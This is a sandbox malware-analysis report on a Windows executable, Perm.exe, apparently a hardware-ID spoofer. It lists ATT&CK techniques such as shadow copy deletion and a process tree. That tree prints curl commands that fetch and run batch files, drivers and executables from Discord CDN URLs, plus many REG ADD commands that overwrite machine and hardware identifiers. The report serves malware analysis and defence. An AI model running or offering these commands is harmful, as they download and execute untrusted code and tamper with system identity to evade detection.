69dcfed1d7294e9dc9ddb41aa3d89af046d33fa119999978b6ba99b708094d43

Analysis

max time kernel
183s
max time network
183s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
01/09/2024, 18:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Perm.exe
Size

1.4MB
MD5

785fcb31b0ccaf4ac9cc6a64eaf88eed
SHA1

a14000827d904d853c4b105c72c6acdafde2ff87
SHA256

69dcfed1d7294e9dc9ddb41aa3d89af046d33fa119999978b6ba99b708094d43
SHA512

bb2101ab7d100faa0768178f2855c0b69d4338ede01ec0e8fb835cf43895a130742edd316991fb4dfd667ec4c05156d2ef834c4c96645a8fc074287742b56fa9
SSDEEP

24576:E6qsgabtl9Z8N96AQ8DSoRPm/Rwn4o60OegX7Aozptl72NkoV:is9bnEN3v+DenO0Ervzd2Nkw

Score

9^/10

defense_evasion discovery evasion execution impact persistence privilege_escalation ransomware

Malware Config

Signatures

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
452	powershell.exe

Enumerates connected drives 3 TTPs 3 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\D:	fsutil.exe
File opened (read-only)	\??\E:	fsutil.exe
File opened (read-only)	\??\F:	fsutil.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Drops file in System32 directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\wbem\repository\OBJECTS.DATA	svchost.exe
File opened for modification	C:\Windows\system32\wbem\repository\INDEX.BTR	svchost.exe
File opened for modification	C:\Windows\system32\wbem\repository	svchost.exe
File opened for modification	C:\Windows\system32\wbem\repository\WRITABLE.TST	svchost.exe
File opened for modification	C:\Windows\system32\wbem\repository\MAPPING1.MAP	svchost.exe
File opened for modification	C:\Windows\system32\wbem\repository\MAPPING2.MAP	svchost.exe
File opened for modification	C:\Windows\system32\wbem\repository\MAPPING3.MAP	svchost.exe

Drops file in Windows directory 10 IoCs

description	ioc	Process
File created	C:\Windows\IME\hwidspoofer.sys	curl.exe
File created	C:\Windows\GameBarPresenceWriter\valo1.bat	curl.exe
File created	C:\Windows\GameBarPresenceWriter\Solution.exe	curl.exe
File created	C:\Windows\GameBarPresenceWriter\Solution64.sys	curl.exe
File created	C:\Windows\GameBarPresenceWriter\Disk1.exe	curl.exe
File created	C:\Windows\GameBarPresenceWriter\Disk2.exe	curl.exe
File created	C:\Windows\GameBarPresenceWriter\Mac.bat	curl.exe
File created	C:\Windows\IME\kdmapper.exe	curl.exe
File created	C:\Windows\GameBarPresenceWriter\FortniteCleaner.bat	curl.exe
File created	C:\Windows\GameBarPresenceWriter\valo2.bat	curl.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1752	sc.exe
4868	sc.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
220	cmd.exe
3068	reg.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "297082794-2827224685-1381828469"	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier = "297082794-2827224685-1381828469"	reg.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
3788	ipconfig.exe

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
4376	vssadmin.exe

Modifies registry key 1 TTPs 52 IoCs

Modify Registry

T1112

pid	Process
1820	reg.exe
2596	reg.exe
836	reg.exe
1572	reg.exe
1868	reg.exe
1444	reg.exe
1912	reg.exe
3628	reg.exe
4404	reg.exe
4728	reg.exe
740	reg.exe
2816	reg.exe
2688	reg.exe
2392	reg.exe
4832	reg.exe
3144	reg.exe
3128	reg.exe
3384	reg.exe
3392	reg.exe
2488	reg.exe
220	reg.exe
2712	reg.exe
4720	reg.exe
4568	reg.exe
3388	reg.exe
4384	reg.exe
3444	reg.exe
4472	reg.exe
932	reg.exe
3560	reg.exe
2908	reg.exe
4744	reg.exe
4324	reg.exe
4352	reg.exe
2316	reg.exe
1464	reg.exe
3068	reg.exe
1012	reg.exe
1968	reg.exe
4884	reg.exe
1108	reg.exe
2504	reg.exe
3488	reg.exe
324	reg.exe
1428	reg.exe
3048	reg.exe
2216	reg.exe
1852	reg.exe
3284	reg.exe
3836	reg.exe
3296	reg.exe
2720	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2996	powershell.exe
2996	powershell.exe
452	powershell.exe
452	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3424	Perm.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2996	powershell.exe
Token: SeBackupPrivilege	2504	vssvc.exe
Token: SeRestorePrivilege	2504	vssvc.exe
Token: SeAuditPrivilege	2504	vssvc.exe
Token: SeDebugPrivilege	452	powershell.exe
Token: SeIncreaseQuotaPrivilege	452	powershell.exe
Token: SeSecurityPrivilege	452	powershell.exe
Token: SeTakeOwnershipPrivilege	452	powershell.exe
Token: SeLoadDriverPrivilege	452	powershell.exe
Token: SeSystemProfilePrivilege	452	powershell.exe
Token: SeSystemtimePrivilege	452	powershell.exe
Token: SeProfSingleProcessPrivilege	452	powershell.exe
Token: SeIncBasePriorityPrivilege	452	powershell.exe
Token: SeCreatePagefilePrivilege	452	powershell.exe
Token: SeBackupPrivilege	452	powershell.exe
Token: SeRestorePrivilege	452	powershell.exe
Token: SeShutdownPrivilege	452	powershell.exe
Token: SeDebugPrivilege	452	powershell.exe
Token: SeSystemEnvironmentPrivilege	452	powershell.exe
Token: SeRemoteShutdownPrivilege	452	powershell.exe
Token: SeUndockPrivilege	452	powershell.exe
Token: SeManageVolumePrivilege	452	powershell.exe
Token: 33	452	powershell.exe
Token: 34	452	powershell.exe
Token: 35	452	powershell.exe
Token: 36	452	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	716	svchost.exe
Token: SeIncreaseQuotaPrivilege	716	svchost.exe
Token: SeSecurityPrivilege	716	svchost.exe
Token: SeTakeOwnershipPrivilege	716	svchost.exe
Token: SeLoadDriverPrivilege	716	svchost.exe
Token: SeSystemtimePrivilege	716	svchost.exe
Token: SeBackupPrivilege	716	svchost.exe
Token: SeRestorePrivilege	716	svchost.exe
Token: SeShutdownPrivilege	716	svchost.exe
Token: SeSystemEnvironmentPrivilege	716	svchost.exe
Token: SeUndockPrivilege	716	svchost.exe
Token: SeManageVolumePrivilege	716	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	716	svchost.exe
Token: SeIncreaseQuotaPrivilege	716	svchost.exe
Token: SeSecurityPrivilege	716	svchost.exe
Token: SeTakeOwnershipPrivilege	716	svchost.exe
Token: SeLoadDriverPrivilege	716	svchost.exe
Token: SeSystemtimePrivilege	716	svchost.exe
Token: SeBackupPrivilege	716	svchost.exe
Token: SeRestorePrivilege	716	svchost.exe
Token: SeShutdownPrivilege	716	svchost.exe
Token: SeSystemEnvironmentPrivilege	716	svchost.exe
Token: SeUndockPrivilege	716	svchost.exe
Token: SeManageVolumePrivilege	716	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	716	svchost.exe
Token: SeIncreaseQuotaPrivilege	716	svchost.exe
Token: SeSecurityPrivilege	716	svchost.exe
Token: SeTakeOwnershipPrivilege	716	svchost.exe
Token: SeLoadDriverPrivilege	716	svchost.exe
Token: SeSystemtimePrivilege	716	svchost.exe
Token: SeBackupPrivilege	716	svchost.exe
Token: SeRestorePrivilege	716	svchost.exe
Token: SeShutdownPrivilege	716	svchost.exe
Token: SeSystemEnvironmentPrivilege	716	svchost.exe
Token: SeUndockPrivilege	716	svchost.exe
Token: SeManageVolumePrivilege	716	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	716	svchost.exe
Token: SeIncreaseQuotaPrivilege	716	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3424 wrote to memory of 3932	3424	Perm.exe	83
PID 3424 wrote to memory of 3932	3424	Perm.exe	83
PID 3932 wrote to memory of 2904	3932	cmd.exe	85
PID 3932 wrote to memory of 2904	3932	cmd.exe	85
PID 3932 wrote to memory of 3532	3932	cmd.exe	86
PID 3932 wrote to memory of 3532	3932	cmd.exe	86
PID 3932 wrote to memory of 3104	3932	cmd.exe	87
PID 3932 wrote to memory of 3104	3932	cmd.exe	87
PID 3424 wrote to memory of 4508	3424	Perm.exe	100
PID 3424 wrote to memory of 4508	3424	Perm.exe	100
PID 3424 wrote to memory of 2636	3424	Perm.exe	102
PID 3424 wrote to memory of 2636	3424	Perm.exe	102
PID 2636 wrote to memory of 2816	2636	cmd.exe	104
PID 2636 wrote to memory of 2816	2636	cmd.exe	104
PID 3424 wrote to memory of 372	3424	Perm.exe	105
PID 3424 wrote to memory of 372	3424	Perm.exe	105
PID 3424 wrote to memory of 4764	3424	Perm.exe	107
PID 3424 wrote to memory of 4764	3424	Perm.exe	107
PID 3424 wrote to memory of 4320	3424	Perm.exe	109
PID 3424 wrote to memory of 4320	3424	Perm.exe	109
PID 4320 wrote to memory of 3320	4320	cmd.exe	111
PID 4320 wrote to memory of 3320	4320	cmd.exe	111
PID 3424 wrote to memory of 4456	3424	Perm.exe	112
PID 3424 wrote to memory of 4456	3424	Perm.exe	112
PID 4456 wrote to memory of 3288	4456	cmd.exe	114
PID 4456 wrote to memory of 3288	4456	cmd.exe	114
PID 3424 wrote to memory of 4900	3424	Perm.exe	115
PID 3424 wrote to memory of 4900	3424	Perm.exe	115
PID 4900 wrote to memory of 436	4900	cmd.exe	117
PID 4900 wrote to memory of 436	4900	cmd.exe	117
PID 3424 wrote to memory of 4016	3424	Perm.exe	118
PID 3424 wrote to memory of 4016	3424	Perm.exe	118
PID 4016 wrote to memory of 2040	4016	cmd.exe	120
PID 4016 wrote to memory of 2040	4016	cmd.exe	120
PID 3424 wrote to memory of 2436	3424	Perm.exe	121
PID 3424 wrote to memory of 2436	3424	Perm.exe	121
PID 2436 wrote to memory of 4064	2436	cmd.exe	123
PID 2436 wrote to memory of 4064	2436	cmd.exe	123
PID 3424 wrote to memory of 4232	3424	Perm.exe	124
PID 3424 wrote to memory of 4232	3424	Perm.exe	124
PID 4232 wrote to memory of 4404	4232	cmd.exe	126
PID 4232 wrote to memory of 4404	4232	cmd.exe	126
PID 3424 wrote to memory of 3316	3424	Perm.exe	127
PID 3424 wrote to memory of 3316	3424	Perm.exe	127
PID 3316 wrote to memory of 3128	3316	cmd.exe	129
PID 3316 wrote to memory of 3128	3316	cmd.exe	129
PID 3424 wrote to memory of 3336	3424	Perm.exe	130
PID 3424 wrote to memory of 3336	3424	Perm.exe	130
PID 3336 wrote to memory of 2908	3336	cmd.exe	132
PID 3336 wrote to memory of 2908	3336	cmd.exe	132
PID 3424 wrote to memory of 2880	3424	Perm.exe	133
PID 3424 wrote to memory of 2880	3424	Perm.exe	133
PID 2880 wrote to memory of 220	2880	cmd.exe	135
PID 2880 wrote to memory of 220	2880	cmd.exe	135
PID 3424 wrote to memory of 5008	3424	Perm.exe	136
PID 3424 wrote to memory of 5008	3424	Perm.exe	136
PID 5008 wrote to memory of 3384	5008	cmd.exe	138
PID 5008 wrote to memory of 3384	5008	cmd.exe	138
PID 3424 wrote to memory of 468	3424	Perm.exe	139
PID 3424 wrote to memory of 468	3424	Perm.exe	139
PID 468 wrote to memory of 324	468	cmd.exe	141
PID 468 wrote to memory of 324	468	cmd.exe	141
PID 3424 wrote to memory of 4656	3424	Perm.exe	142
PID 3424 wrote to memory of 4656	3424	Perm.exe	142

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\Perm.exe
"C:\Users\Admin\AppData\Local\Temp\Perm.exe"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:3424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Perm.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3932
- - C:\Windows\system32\certutil.exe
    certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Perm.exe" MD5
    3⤵
    PID:2904
- - C:\Windows\system32\find.exe
    find /i /v "md5"
    3⤵
    PID:3532
- - C:\Windows\system32\find.exe
    find /i /v "certutil"
    3⤵
    PID:3104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl "https://cdn.discordapp.com/attachments/1251543032390483991/1275110312865042442/hwid.bat?ex=66c4b284&is=66c36104&hm=fa8fe1a6c5ca4d31494698794672c828a01e8163ff4f40e89ab604b6c510196b&" --output hwid.bat >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2636
- - C:\Windows\system32\curl.exe
    curl "https://cdn.discordapp.com/attachments/1251543032390483991/1275110312865042442/hwid.bat?ex=66c4b284&is=66c36104&hm=fa8fe1a6c5ca4d31494698794672c828a01e8163ff4f40e89ab604b6c510196b&" --output hwid.bat
    3⤵
    PID:2816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c hwid.bat
  2⤵
  PID:372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent "https://cdn.discordapp.com/attachments/1251543032390483991/1275100412554248384/Solution.exe?ex=66c4a94c&is=66c357cc&hm=72be3d1cc3376afa099e88008a56b57f451b2713f60f889a31dd8fcba52f3c6a&" --output C:\Windows\GameBarPresenceWriter\Solution.exe >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4320
- - C:\Windows\system32\curl.exe
    curl --silent "https://cdn.discordapp.com/attachments/1251543032390483991/1275100412554248384/Solution.exe?ex=66c4a94c&is=66c357cc&hm=72be3d1cc3376afa099e88008a56b57f451b2713f60f889a31dd8fcba52f3c6a&" --output C:\Windows\GameBarPresenceWriter\Solution.exe
    3⤵
    - Drops file in Windows directory
    PID:3320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent "https://cdn.discordapp.com/attachments/1251543032390483991/1275100410897764393/Solution64.sys?ex=66c4a94c&is=66c357cc&hm=84211dd825a1d471ce4a111e6145814f0ea2f48391ccff33c599f3d4c15e0950&" --output C:\Windows\GameBarPresenceWriter\Solution64.sys >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4456
- - C:\Windows\system32\curl.exe
    curl --silent "https://cdn.discordapp.com/attachments/1251543032390483991/1275100410897764393/Solution64.sys?ex=66c4a94c&is=66c357cc&hm=84211dd825a1d471ce4a111e6145814f0ea2f48391ccff33c599f3d4c15e0950&" --output C:\Windows\GameBarPresenceWriter\Solution64.sys
    3⤵
    - Drops file in Windows directory
    PID:3288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent "https://cdn.discordapp.com/attachments/1251543032390483991/1275100411291762839/Disk1.exe?ex=66c4a94c&is=66c357cc&hm=6c6ed2ef51cd459fef4778a566d7810d94b78186651ce2d2977237b4676e2f02&" --output C:\Windows\GameBarPresenceWriter\Disk1.exe >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4900
- - C:\Windows\system32\curl.exe
    curl --silent "https://cdn.discordapp.com/attachments/1251543032390483991/1275100411291762839/Disk1.exe?ex=66c4a94c&is=66c357cc&hm=6c6ed2ef51cd459fef4778a566d7810d94b78186651ce2d2977237b4676e2f02&" --output C:\Windows\GameBarPresenceWriter\Disk1.exe
    3⤵
    - Drops file in Windows directory
    PID:436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent "https://cdn.discordapp.com/attachments/1251543032390483991/1275100411690487930/Disk2.exe?ex=66c4a94c&is=66c357cc&hm=4ae7332e70801e70f0c1fb73be18a11e8d0077bc96c9a15fd7ef25c41fbd5346&" --output C:\Windows\GameBarPresenceWriter\Disk2.exe >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4016
- - C:\Windows\system32\curl.exe
    curl --silent "https://cdn.discordapp.com/attachments/1251543032390483991/1275100411690487930/Disk2.exe?ex=66c4a94c&is=66c357cc&hm=4ae7332e70801e70f0c1fb73be18a11e8d0077bc96c9a15fd7ef25c41fbd5346&" --output C:\Windows\GameBarPresenceWriter\Disk2.exe
    3⤵
    - Drops file in Windows directory
    PID:2040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent "https://cdn.discordapp.com/attachments/1251543032390483991/1275100412013445120/Mac.bat?ex=66c4a94c&is=66c357cc&hm=7e4e5f7cacdc3222b7cd3c78e0226993dcbe362a1eb49888ed8f5d450516ab33&" --output C:\Windows\GameBarPresenceWriter\Mac.bat >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2436
- - C:\Windows\system32\curl.exe
    curl --silent "https://cdn.discordapp.com/attachments/1251543032390483991/1275100412013445120/Mac.bat?ex=66c4a94c&is=66c357cc&hm=7e4e5f7cacdc3222b7cd3c78e0226993dcbe362a1eb49888ed8f5d450516ab33&" --output C:\Windows\GameBarPresenceWriter\Mac.bat
    3⤵
    - Drops file in Windows directory
    PID:4064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d %Random% /f >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4232
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d 29698 /f
    3⤵
    - Modifies registry key
    PID:4404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d %Random% /f >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3316
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d 29698 /f
    3⤵
    - Modifies registry key
    PID:3128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3336
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {296983317-744718031-1564316689} /f
    3⤵
    - Modifies registry key
    PID:2908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2880
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d 296983317-744718031-1564316689 /f
    3⤵
    - Modifies registry key
    PID:220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5008
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {2970114065-253129326-2595720616} /f
    3⤵
    - Modifies registry key
    PID:3384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:468
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {2970114065-253129326-2595720616} /f
    3⤵
    - Modifies registry key
    PID:324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
  2⤵
  PID:4656
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d 2970114065-253129326-2595720616 /f
    3⤵
    - Modifies registry key
    PID:1868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
  2⤵
  PID:2488
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d 2970114065-253129326-2595720616 /f
    3⤵
    - Modifies registry key
    PID:4472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
  2⤵
  PID:2316
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d 2970114065-253129326-2595720616 /f
    3⤵
    - Modifies registry key
    PID:3392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul
  2⤵
  PID:3884
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d 2970114065-253129326-2595720616 /f
    3⤵
    - Modifies registry key
    PID:1444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul
  2⤵
  PID:932
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d 2970524814-10408622-350424542 /f
    3⤵
    - Modifies registry key
    PID:4568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
  2⤵
  PID:3628
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d 2970524814-10408622-350424542 /f
    3⤵
    - Modifies registry key
    PID:2712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
  2⤵
  PID:2492
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d 2970524814-10408622-350424542 /f
    3⤵
    - Modifies registry key
    PID:4744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
  2⤵
  PID:3488
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d 2970524814-10408622-350424542 /f
    3⤵
    - Modifies registry key
    PID:4728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
  2⤵
  PID:3604
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d 2970524814-10408622-350424542 /f
    3⤵
    - Modifies registry key
    PID:1428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
  2⤵
  PID:4508
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d 2970524814-10408622-350424542 /f
    3⤵
    - Modifies registry key
    PID:1968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
  2⤵
  PID:1860
- - C:\Windows\system32\reg.exe
